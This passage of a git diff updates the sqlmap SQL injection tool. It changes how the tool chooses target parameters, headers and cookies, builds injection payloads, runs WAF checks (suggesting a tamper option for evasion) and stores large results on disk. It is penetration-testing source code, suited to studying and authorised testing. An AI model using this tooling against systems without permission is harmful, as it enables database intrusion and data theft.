+    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
+    if not isListLike(injections):
+        injections = []
     injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
 
     _ = dict()
@@ -251,7 +259,7 @@ def start():
         return True
 
     if conf.url and not any((conf.forms, conf.crawlDepth)):
-        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
+        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
 
     if conf.configFile and not kb.targets:
         errMsg = "you did not edit the configuration file properly, set "
@@ -264,13 +272,16 @@ def start():
         logger.info(infoMsg)
 
     hostCount = 0
+    initialHeaders = list(conf.httpHeaders)
 
-    for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
+    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
         try:
             conf.url = targetUrl
-            conf.method = targetMethod
+            conf.method = targetMethod.upper() if targetMethod else targetMethod
             conf.data = targetData
             conf.cookie = targetCookie
+            conf.httpHeaders = list(initialHeaders)
+            conf.httpHeaders.extend(targetHeaders or [])
 
             initTargetEnv()
             parseTargetUrl()
@@ -308,13 +319,13 @@ def start():
                 if conf.forms:
                     message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
                 else:
-                    message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
+                    message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
 
                 if conf.cookie:
                     message += "\nCookie: %s" % conf.cookie
 
                 if conf.data is not None:
-                    message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
+                    message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
 
                 if conf.forms:
                     if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
@@ -324,13 +335,13 @@ def start():
                     test = readInput(message, default="Y")
 
                     if not test or test[0] in ("y", "Y"):
-                        if conf.method == HTTPMETHOD.POST:
-                            message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
+                        if conf.method != HTTPMETHOD.GET:
+                            message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                             conf.data = readInput(message, default=conf.data)
                             conf.data = _randomFillBlankFields(conf.data)
                             conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
 
-                        elif conf.method == HTTPMETHOD.GET:
+                        else:
                             if targetUrl.find("?") > -1:
                                 firstPart = targetUrl[:targetUrl.find("?")]
                                 secondPart = targetUrl[targetUrl.find("?") + 1:]
@@ -366,8 +377,7 @@ def start():
             if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
                 continue
 
-            if conf.checkWaf:
-                checkWaf()
+            checkWaf()
 
             if conf.identifyWaf:
                 identifyWaf()
@@ -420,11 +430,16 @@ def start():
                     if skip:
                         continue
 
+                    if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
+                        continue
+
                     if place not in conf.paramDict:
                         continue
 
                     paramDict = conf.paramDict[place]
 
+                    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
                     for parameter, value in paramDict.items():
                         if not proceed:
                             break
@@ -436,7 +451,7 @@ def start():
                         if paramKey in kb.testedParams:
                             testSqlInj = False
 
-                            infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif parameter in conf.testParameter:
@@ -445,70 +460,90 @@ def start():
                         elif parameter == conf.rParam:
                             testSqlInj = False
 
-                            infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif parameter in conf.skip:
                             testSqlInj = False
 
-                            infoMsg = "skipping %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                            logger.info(infoMsg)
+
+                        elif parameter == conf.csrfToken:
+                            testSqlInj = False
+
+                            infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
                             logger.info(infoMsg)
 
                         # Ignore session-like parameters for --level < 4
                         elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
                             testSqlInj = False
 
-                            infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
+                            infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
-                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
+                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
                             check = checkDynParam(place, parameter, value)
 
                             if not check:
-                                warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
+                                warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                                 logger.warn(warnMsg)
 
+                                if conf.skipStatic:
+                                    infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
+                                    logger.info(infoMsg)
+
+                                    testSqlInj = False
                             else:
-                                infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
+                                infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                                 logger.info(infoMsg)
 
                         kb.testedParams.add(paramKey)
 
                         if testSqlInj:
-                            check = heuristicCheckSqlInjection(place, parameter)
+                            try:
+                                if place == PLACE.COOKIE:
+                                    pushValue(kb.mergeCookies)
+                                    kb.mergeCookies = False
 
-                            if check != HEURISTIC_TEST.POSITIVE:
-                                if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
-                                    infoMsg = "skipping %s parameter '%s'" % (place, parameter)
-                                    logger.info(infoMsg)
-                                    continue
+                                check = heuristicCheckSqlInjection(place, parameter)
 
-                            infoMsg = "testing for SQL injection on %s " % place
-                            infoMsg += "parameter '%s'" % parameter
-                            logger.info(infoMsg)
+                                if check != HEURISTIC_TEST.POSITIVE:
+                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
+                                        infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                                        logger.info(infoMsg)
+                                        continue
 
-                            injection = checkSqlInjection(place, parameter, value)
-                            proceed = not kb.endDetection
+                                infoMsg = "testing for SQL injection on %s " % paramType
+                                infoMsg += "parameter '%s'" % parameter
+                                logger.info(infoMsg)
 
-                            if injection is not None and injection.place is not None:
-                                kb.injections.append(injection)
+                                injection = checkSqlInjection(place, parameter, value)
+                                proceed = not kb.endDetection
 
-                                # In case when user wants to end detection phase (Ctrl+C)
-                                if not proceed:
-                                    break
+                                if injection is not None and injection.place is not None:
+                                    kb.injections.append(injection)
 
-                                msg = "%s parameter '%s' " % (injection.place, injection.parameter)
-                                msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
-                                test = readInput(msg, default="N")
+                                    # In case when user wants to end detection phase (Ctrl+C)
+                                    if not proceed:
+                                        break
 
-                                if test[0] not in ("y", "Y"):
-                                    proceed = False
-                                    paramKey = (conf.hostname, conf.path, None, None)
-                                    kb.testedParams.add(paramKey)
-                            else:
-                                warnMsg = "%s parameter '%s' is not " % (place, parameter)
-                                warnMsg += "injectable"
-                                logger.warn(warnMsg)
+                                    msg = "%s parameter '%s' " % (injection.place, injection.parameter)
+                                    msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
+                                    test = readInput(msg, default="N")
+
+                                    if test[0] not in ("y", "Y"):
+                                        proceed = False
+                                        paramKey = (conf.hostname, conf.path, None, None)
+                                        kb.testedParams.add(paramKey)
+                                else:
+                                    warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
+                                    warnMsg += "injectable"
+                                    logger.warn(warnMsg)
+
+                            finally:
+                                if place == PLACE.COOKIE:
+                                    kb.mergeCookies = popValue()
 
             if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
                 if kb.vainRun and not conf.multipleTargets:
@@ -562,6 +597,11 @@ def start():
                         errMsg += "expression that you have chosen "
                         errMsg += "does not match exclusively True responses"
 
+                    if not conf.tamper:
+                        errMsg += " If you suspect that there is some kind of protection mechanism "
+                        errMsg += "involved (e.g. WAF) maybe you could retry "
+                        errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
+
                     raise SqlmapNotVulnerableException(errMsg)
             else:
                 # Flush the flag
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 38fece4ca..471070b1b 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -71,9 +71,9 @@ def setHandler():
         items.remove(_)
         items.insert(0, _)
 
-    for name, aliases, Handler, Connector in items:
-        if conf.dbms and conf.dbms not in aliases:
-            debugMsg = "skipping test for %s" % name
+    for dbms, aliases, Handler, Connector in items:
+        if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
+            debugMsg = "skipping test for %s" % dbms
             logger.debug(debugMsg)
             continue
 
@@ -84,7 +84,7 @@ def setHandler():
             logger.debug("forcing timeout to 10 seconds")
             conf.timeout = 10
 
-            dialect = DBMS_DICT[name][3]
+            dialect = DBMS_DICT[dbms][3]
 
             if dialect:
                 sqlalchemy = SQLAlchemy(dialect=dialect)
@@ -93,7 +93,10 @@ def setHandler():
                 if sqlalchemy.connector:
                     conf.dbmsConnector = sqlalchemy
                 else:
-                    conf.dbmsConnector.connect()
+                    try:
+                        conf.dbmsConnector.connect()
+                    except NameError:
+                        pass
             else:
                 conf.dbmsConnector.connect()
 
diff --git a/lib/core/__init__.py b/lib/core/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/core/__init__.py
+++ b/lib/core/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/agent.py b/lib/core/agent.py
index ce78736ee..556f379a9 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -10,6 +10,7 @@ import re
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isNumber
 from lib.core.common import isTechniqueAvailable
@@ -19,6 +20,7 @@ from lib.core.common import safeSQLIdentificatorNaming
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import splitFields
 from lib.core.common import unArrayizeValue
+from lib.core.common import urlencode
 from lib.core.common import zeroDepthSearch
 from lib.core.data import conf
 from lib.core.data import kb
@@ -26,11 +28,15 @@ from lib.core.data import queries
 from lib.core.dicts import DUMP_DATA_PREPROCESS
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_COOKIE_DELIMITER
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
@@ -73,7 +79,9 @@ class Agent(object):
 
         retVal = ""
 
-        if where is None and isTechniqueAvailable(kb.technique):
+        if kb.forceWhere:
+            where = kb.forceWhere
+        elif where is None and isTechniqueAvailable(kb.technique):
             where = kb.injection.data[kb.technique].where
 
         if kb.injection.place is not None:
@@ -84,7 +92,7 @@ class Agent(object):
 
         paramString = conf.parameters[place]
         paramDict = conf.paramDict[place]
-        origValue = paramDict[parameter]
+        origValue = getUnicode(paramDict[parameter])
 
         if place == PLACE.URI:
             paramString = origValue
@@ -98,10 +106,8 @@ class Agent(object):
             origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
             if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                 origValue = origValue.split('>')[-1]
-            elif kb.postHint == POST_HINT.JSON:
-                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
-            elif kb.postHint == POST_HINT.JSON_LIKE:
-                origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
+            elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
+                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
             else:
                 _ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
                 origValue = _.split('=', 1)[1] if '=' in _ else ""
@@ -109,6 +115,14 @@ class Agent(object):
             paramString = origValue
             origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
             origValue = origValue[origValue.index(',') + 1:]
+            match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
+            if match:
+                origValue = match.group("value")
+            elif ',' in paramString:
+                header = paramString.split(',')[0]
+
+                if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
+                    origValue = origValue.split(' ')[-1].split(':')[-1]
 
         if conf.prefix:
             value = origValue
@@ -152,7 +166,36 @@ class Agent(object):
         elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
             retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
         else:
-            retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            def _(pattern, repl, string):
+                retVal = string
+                match = None
+                for match in re.finditer(pattern, string):
+                    pass
+
+                if match:
+                    while True:
+                        _ = re.search(r"\\g<([^>]+)>", repl)
+                        if _:
+                            try:
+                                repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+                            except IndexError:
+                                break
+                        else:
+                            break
+                    retVal = string[:match.start()] + repl + string[match.end():]
+                return retVal
+
+            if origValue:
+                regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
+                retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            else:
+                retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+
+            if retVal == paramString and urlencode(parameter) != parameter:
+                retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+
+        if retVal:
+            retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
 
         return retVal
 
@@ -176,6 +219,9 @@ class Agent(object):
         if conf.direct:
             return self.payloadDirect(expression)
 
+        if expression is None:
+            return None
+
         expression = self.cleanupPayload(expression)
         expression = unescaper.escape(expression)
         query = None
@@ -204,7 +250,7 @@ class Agent(object):
             if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
                 query += " "
 
-        query = "%s%s" % (query, expression)
+        query = "%s%s" % ((query or "").replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
 
         return query
 
@@ -217,6 +263,9 @@ class Agent(object):
         if conf.direct:
             return self.payloadDirect(expression)
 
+        if expression is None:
+            return None
+
         expression = self.cleanupPayload(expression)
 
         # Take default values if None
@@ -238,7 +287,7 @@ class Agent(object):
             pass
 
         elif suffix and not comment:
-            expression += suffix
+            expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)
 
         return re.sub(r"(?s);\W*;", ";", expression)
 
@@ -984,7 +1033,7 @@ class Agent(object):
         """
 
         _ = re.escape(PAYLOAD_DELIMITER)
-        return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
+        return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
 
     def runAsDBMSUser(self, query):
         if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 04ef7a691..0e42433d8 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -10,10 +10,27 @@ try:
 except:
    import pickle
 
+import itertools
 import os
+import sys
 import tempfile
 
-from lib.core.settings import BIGARRAY_CHUNK_LENGTH
+from lib.core.exception import SqlmapSystemException
+from lib.core.settings import BIGARRAY_CHUNK_SIZE
+
+DEFAULT_SIZE_OF = sys.getsizeof(object())
+
+def _size_of(object_):
+    """
+    Returns total size of a given object_ (in bytes)
+    """
+
+    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
+    if isinstance(object_, dict):
+        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
+    elif hasattr(object_, "__iter__"):
+        retval += sum(_size_of(_) for _ in object_)
+    return retval
 
 class Cache(object):
     """
@@ -32,15 +49,21 @@ class BigArray(list):
 
     def __init__(self):
         self.chunks = [[]]
+        self.chunk_length = sys.maxint
         self.cache = None
-        self.length = 0
         self.filenames = set()
+        self._os_remove = os.remove
+        self._size_counter = 0
 
     def append(self, value):
         self.chunks[-1].append(value)
-        if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
+        if self.chunk_length == sys.maxint:
+            self._size_counter += _size_of(value)
+            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
+                self.chunk_length = len(self.chunks[-1])
+                self._size_counter = None
+        if len(self.chunks[-1]) >= self.chunk_length:
             filename = self._dump(self.chunks[-1])
-            del(self.chunks[-1][:])
             self.chunks[-1] = filename
             self.chunks.append([])
 
@@ -51,8 +74,13 @@ class BigArray(list):
     def pop(self):
         if len(self.chunks[-1]) < 1:
             self.chunks.pop()
-            with open(self.chunks[-1], "rb") as fp:
-                self.chunks[-1] = pickle.load(fp)
+            try:
+                with open(self.chunks[-1], "rb") as fp:
+                    self.chunks[-1] = pickle.load(fp)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
         return self.chunks[-1].pop()
 
     def index(self, value):
@@ -61,21 +89,41 @@ class BigArray(list):
                 return index
         return ValueError, "%s is not in list" % value
 
-    def _dump(self, value):
-        handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
-        self.filenames.add(filename)
-        os.close(handle)
-        with open(filename, "w+b") as fp:
-            pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
-        return filename
+    def _dump(self, chunk):
+        try:
+            handle, filename = tempfile.mkstemp()
+            self.filenames.add(filename)
+            os.close(handle)
+            with open(filename, "w+b") as fp:
+                pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
+            return filename
+        except (OSError, IOError), ex:
+            errMsg = "exception occurred while storing data "
+            errMsg += "to a temporary file ('%s'). Please " % ex
+            errMsg += "make sure that there is enough disk space left. If problem persists, "
+            errMsg += "try to set environment variable 'TEMP' to a location "
+            errMsg += "writeable by the current user"
+            raise SqlmapSystemException, errMsg
 
     def _checkcache(self, index):
         if (self.cache and self.cache.index != index and self.cache.dirty):
             filename = self._dump(self.cache.data)
             self.chunks[self.cache.index] = filename
         if not (self.cache and self.cache.index == index):
-            with open(self.chunks[index], "rb") as fp:
-                self.cache = Cache(index, pickle.load(fp), False)
+            try:
+                with open(self.chunks[index], "rb") as fp:
+                    self.cache = Cache(index, pickle.load(fp), False)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
+
+    def __getstate__(self):
+        return self.chunks, self.filenames
+
+    def __setstate__(self, state):
+        self.__init__()
+        self.chunks, self.filenames = state
 
     def __getslice__(self, i, j):
         retval = BigArray()
@@ -88,8 +136,8 @@ class BigArray(list):
     def __getitem__(self, y):
         if y < 0:
             y += len(self)
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             return chunk[offset]
@@ -98,8 +146,8 @@ class BigArray(list):
             return self.cache.data[offset]
 
     def __setitem__(self, y, value):
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             chunk[offset] = value
@@ -116,11 +164,4 @@ class BigArray(list):
             yield self[i]
 
     def __len__(self):
-        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
-
-    def __del__(self):
-        for filename in self.filenames:
-            try:
-                os.remove(filename)
-            except:
-                pass
+        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
diff --git a/lib/core/common.py b/lib/core/common.py
index 245763b9b..6f9303876 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,8 +9,12 @@ import codecs
 import contextlib
 import cookielib
 import copy
+import getpass
+import hashlib
 import httplib
 import inspect
+import json
+import locale
 import logging
 import ntpath
 import os
@@ -23,6 +27,7 @@ import sys
 import tempfile
 import time
 import urllib
+import urllib2
 import urlparse
 import unicodedata
 
@@ -36,7 +41,9 @@ from subprocess import PIPE
 from subprocess import Popen as execute
 from xml.dom import minidom
 from xml.sax import parse
+from xml.sax import SAXParseException
 
+from extra.beep.beep import beep
 from extra.cloak.cloak import decloak
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.bigarray import BigArray
@@ -71,12 +78,13 @@ from lib.core.enums import PAYLOAD
 from lib.core.enums import REFLECTIVE_COUNTER
 from lib.core.enums import SORT_ORDER
 from lib.core.exception import SqlmapDataException
-from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
@@ -90,14 +98,14 @@ from lib.core.settings import DBMS_DIRECTORY_DICT
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DEFAULT_MSSQL_SCHEMA
-from lib.core.settings import DESCRIPTION
-from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
 from lib.core.settings import DUMMY_USER_INJECTION
 from lib.core.settings import DYNAMICITY_MARK_LENGTH
 from lib.core.settings import ERROR_PARSING_REGEXES
 from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
 from lib.core.settings import FORM_SEARCH_REGEX
 from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
+from lib.core.settings import GIT_PAGE
+from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
 from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
 from lib.core.settings import HASHDB_MILESTONE_VALUE
 from lib.core.settings import HOST_ALIASES
@@ -110,7 +118,6 @@ from lib.core.settings import LARGE_OUTPUT_THRESHOLD
 from lib.core.settings import MIN_ENCODED_LEN_CHECK
 from lib.core.settings import MIN_TIME_RESPONSES
 from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
-from lib.core.settings import ML
 from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_AMP_MARKER
@@ -127,9 +134,7 @@ from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
 from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
 from lib.core.settings import REFLECTED_VALUE_MARKER
 from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
-from lib.core.settings import REVISION
 from lib.core.settings import SENSITIVE_DATA_REGEX
-from lib.core.settings import SITE
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import TEXT_TAG_REGEX
 from lib.core.settings import TIME_STDEV_COEFF
@@ -139,7 +144,6 @@ from lib.core.settings import URI_QUESTION_MARKER
 from lib.core.settings import URLENCODE_CHAR_LIMIT
 from lib.core.settings import URLENCODE_FAILSAFE_CHARS
 from lib.core.settings import USER_AGENT_ALIASES
-from lib.core.settings import VERSION
 from lib.core.settings import VERSION_STRING
 from lib.core.threads import getCurrentThreadData
 from lib.utils.sqlalchemy import _sqlalchemy
@@ -431,10 +435,9 @@ class Backend:
 
         This functions is called to:
 
-        1. Sort the tests, getSortedInjectionTests() - detection phase.
-        2. Ask user whether or not skip specific DBMS tests in detection phase,
+        1. Ask user whether or not skip specific DBMS tests in detection phase,
            lib/controller/checks.py - detection phase.
-        3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
+        2. Sort the fingerprint of the DBMS, lib/controller/handler.py -
            fingerprint phase.
         """
 
@@ -442,6 +445,13 @@ class Backend:
 
     @staticmethod
     def getIdentifiedDbms():
+        """
+        This functions is called to:
+
+        1. Sort the tests, getSortedInjectionTests() - detection phase.
+        2. Etc.
+        """
+
         dbms = None
 
         if not kb:
@@ -449,13 +459,13 @@ class Backend:
         elif Backend.getForcedDbms() is not None:
             dbms = Backend.getForcedDbms()
         elif Backend.getDbms() is not None:
-            dbms = kb.dbms
-        elif conf.get("dbms"):
-            dbms = conf.dbms
-        elif Backend.getErrorParsedDBMSes():
-            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
+            dbms = Backend.getDbms()
         elif kb.get("injection") and kb.injection.dbms:
             dbms = unArrayizeValue(kb.injection.dbms)
+        elif Backend.getErrorParsedDBMSes():
+            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
+        elif conf.get("dbms"):
+            dbms = conf.get("dbms")
 
         return aliasToDbmsEnum(dbms)
 
@@ -537,7 +547,6 @@ def paramToDict(place, parameters=None):
     if place in conf.parameters and not parameters:
         parameters = conf.parameters[place]
 
-    parameters = parameters.replace(", ", ",")
     parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
     if place == PLACE.COOKIE:
         splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
@@ -549,20 +558,23 @@ def paramToDict(place, parameters=None):
         parts = element.split("=")
 
         if len(parts) >= 2:
-            parameter = parts[0].replace(" ", "")
+            parameter = urldecode(parts[0].replace(" ", ""))
+
+            if not parameter:
+                continue
 
             if conf.paramDel and conf.paramDel == '\n':
                 parts[-1] = parts[-1].rstrip()
 
             condition = not conf.testParameter
-            condition |= parameter in conf.testParameter
+            condition |= conf.testParameter is not None and parameter in conf.testParameter
             condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
 
             if condition:
                 testableParameters[parameter] = "=".join(parts[1:])
-                if not conf.multipleTargets:
+                if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
